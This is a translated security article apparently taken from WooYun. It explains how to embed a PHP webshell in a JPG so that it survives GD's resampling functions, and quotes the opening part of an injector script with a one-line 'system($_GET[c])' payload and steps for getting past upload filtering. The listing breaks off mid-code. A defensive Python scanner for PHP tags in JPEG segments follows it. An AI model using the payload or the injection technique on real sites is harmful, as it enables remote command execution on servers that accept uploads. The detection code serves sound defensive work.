
Bypassing PHP's imagecopyresampled() and imagecopyresized() to Build a JPG Image Webshell

Source: wooyun   Author: livers (如梦似幻)   Date: 2013-07-27

Someone earlier published a method that gets a payload past the resampling functions named above using PNG images. The idea is to place a one-line webshell inside the PNG's IDAT chunks and apply a set of modular-arithmetic calculations so that it survives re-encoding; see:
https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

That approach, however, is constrained: the image must be 320×320 and must be in PNG format.

So what about JPG?

An ingenious foreigner came up with the following method:
 
 
```php
<?php
/*

The algorithm of injecting the payload into the JPG image, which will keep unchanged after transformations
caused by PHP functions imagecopyresized() and imagecopyresampled().
It is necessary that the size and quality of the initial image are the same as those of the processed
image.

1) Upload an arbitrary image via secured files upload script
2) Save the processed image and launch:
php jpg_payload.php <jpg_name.jpg>

In case of successful injection you will get a specially crafted image, which should be uploaded again.

Since the most straightforward injection method is used, the following problems can occur:
1) After the second processing the injected data may become partially corrupted.
2) The jpg_payload.php script outputs "Something's wrong".
If this happens, try to change the payload (e.g. add some symbols at the beginning) or try another
initial image.

Sergey Bobrov @Black2Fan.

See also:
https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

*/

$miniPayload = '<?=system($_GET[c]);?>';

if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
    die('php-gd is not installed');
}

if(!isset($argv[1])) {
    die('php jpg_payload.php <jpg_name.jpg>');
}

set_error_handler("custom_error_handler");

for($pad = 0; $pad < 1024; $pad++) {
    $nullbytePayloadSize = $pad;
    $dis = new DataInputStream($argv[1]);
    $outStream = file_get_contents($argv[1]);
    $extraBytes = 0;
    $correctImage = TRUE;

    if($dis->readShort() != 0xFFD8) {
        die('Incorrect SOI marker');
    }

    while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
        $marker = $dis->readByte();
        $size = $dis->readShort() - 2;
        $dis->skip($size);
        if($marker === 0xDA) {
            $startPos = $dis->seek();
            $outStreamTmp =
```

(Page 1 of 4; the listing is cut off here and continues on the following pages of the original article.)
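As an added defensive example (not the article's or Bobrov's code), this Python scanner walks a JPEG's marker segments, including the entropy-coded data after the SOS marker where the script above begins its injection, and reports every PHP open tag it finds with the segment name and file offset; the JPEG byte strings are constructed for the test and are not decodable images.

```python
import re
import struct

# PHP open tags worth flagging inside image bytes; a bare "<?" is far too noisy in binary data.
PHP_TAGS = re.compile(rb"<\?php|<\?=")
SEGMENT_NAMES = {0xC0: "SOF0", 0xC2: "SOF2", 0xC4: "DHT", 0xD8: "SOI", 0xD9: "EOI",
                 0xDA: "SOS", 0xDB: "DQT", 0xFE: "COM"}

def jpeg_segments(data):
    """Yield (marker, offset, payload) per segment; scan data after SOS uses pseudo-marker 0.
    Assumes a single-scan (baseline) file."""
    if data[:2] != b"\xFF\xD8":
        raise ValueError("missing SOI marker")
    pos = 2
    while pos + 2 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker == 0xD9:                      # EOI carries no length field
            yield marker, pos, b""
            return
        if pos + 4 > len(data):
            raise ValueError("truncated segment header")
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        yield marker, pos, data[pos + 4:pos + 2 + length]
        pos += 2 + length
        if marker == 0xDA:                      # entropy-coded data runs from here to EOI
            end = data.rfind(b"\xFF\xD9")
            end = end if end >= pos else len(data)
            yield 0, pos, data[pos:end]
            pos = end

def find_php_in_jpeg(data):
    """Return [(segment_name, absolute_offset, tag)] for every PHP open tag in the file."""
    hits = []
    for marker, offset, payload in jpeg_segments(data):
        name = "SCAN" if marker == 0 else SEGMENT_NAMES.get(marker, f"0x{marker:02X}")
        base = offset if marker == 0 else offset + 4   # payload starts after marker + length
        for m in PHP_TAGS.finditer(payload):
            hits.append((name, base + m.start(), m.group().decode()))
    return hits

def _segment(marker, payload):
    """Build one marker segment (constructed test data, not a decodable image)."""
    return b"\xFF" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload

# Constructed samples: structurally valid segment chains with zeroed tables, not real photos.
CLEAN = (b"\xFF\xD8" + _segment(0xDB, bytes(65)) + _segment(0xC0, bytes(11))
         + _segment(0xDA, bytes(6)) + b"\x12\x34\x56" + b"\xFF\xD9")
TAINTED = (b"\xFF\xD8" + _segment(0xFE, b"<?php echo 1;?>") + _segment(0xDB, bytes(65))
           + _segment(0xC0, bytes(11)) + _segment(0xDA, bytes(6))
           + b"\x12\x34<?= 'x' ?>\x56" + b"\xFF\xD9")
```

Since the script's own comment requires the processed image to keep the same size and quality as the original, an upload handler that re-encodes at a quality or to dimensions the uploader cannot predict removes that precondition; the scan above is an independent second check on the stored bytes.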
